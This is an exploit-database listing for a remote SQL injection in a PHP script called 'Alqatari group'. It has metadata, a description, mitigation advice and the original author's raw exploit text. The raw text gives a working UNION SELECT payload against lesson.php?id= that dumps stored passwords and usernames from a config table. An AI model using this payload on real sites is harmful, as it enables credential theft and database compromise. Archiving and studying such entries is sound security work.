Alqatari group Version 1.0 - exploit.company

vendor:

Alqatari group Version 1.0

by:

Red-D3v1L

CVSS

HIGH

SQL Injection

CWE

Product Name: Alqatari group Version 1.0

Affected Version From: 1

Affected Version To: 5

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Alqatari group Version 1.0 <== 5.0 (id) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. The malicious request contains an SQL query in the form of a parameter value that is passed to the vulnerable application. This can allow an attacker to gain access to sensitive information stored in the database, such as user credentials, or to modify the data stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being passed to the database. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

      _ _ _ _  _ _ _   _ _ _ _    _ _ _    __  _ _ _ _               _____1337~h4x0rZ__   _        ___    ___
    /_/Rd_ _ /   _ _\/   _ _ /   \      \<   |/_ _   /         /\   |     \    /\  ||   \( )   /\  |  \  (| |
    \_ _ _ _/  /_ _ /  /      __ |  ()  / |  |  /   / [d0t]com/@~\  | (O) /   /+~\ ||_O_|( )  /0O\ |   \  | |
     _ _ _ _\  \_ _ \  \ _ _ _   |     \  |  | /   /_ _      /|__|\ |     \  /|__|\|| O |( ) /+__+\| ^  \ | |
   /_ _ _ _ _\ _ _ _/\ _ _ _ /   |__|\__\ |__|/_ _ _ _ _\   /\|  |/\|__|\__\( )  ( )|___/(_)/\|  |/\__\__\|_ >
       
	   
==============================================================================
        [ª] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
        [ª]  Alqatari group Version 1.0 <== 5.0 (id) Remote SQL Injection Vulnerability
==============================================================================
    [ª] my home:             [ http://sec-r1z.com ]
    [ª] Script:              [ Alqatari group Version 1.0 ]
    [ª] Language:            [ PHP ]
    [ª] Founder:             [ ./Red-D3v1L ]
    [ª] Gr44tz to:           [ sec-r1z# Crew - Hackteach Team - my love :$ ]
    [ª] Fuck to :            [ All LamErZ And n00bz ]
########################################################################

===[ Exploit SQL ]===  

 [ª] [Path]/lesson.php?id=[SQL]

 [ª] Live dem0 : 

http://www.site.com/lesson.php?id=-258+union+select+concat%28c_pass,0x3e,c_user%29,2,3+from+q_config


Author: Red-D3v1L <-

###########################################################################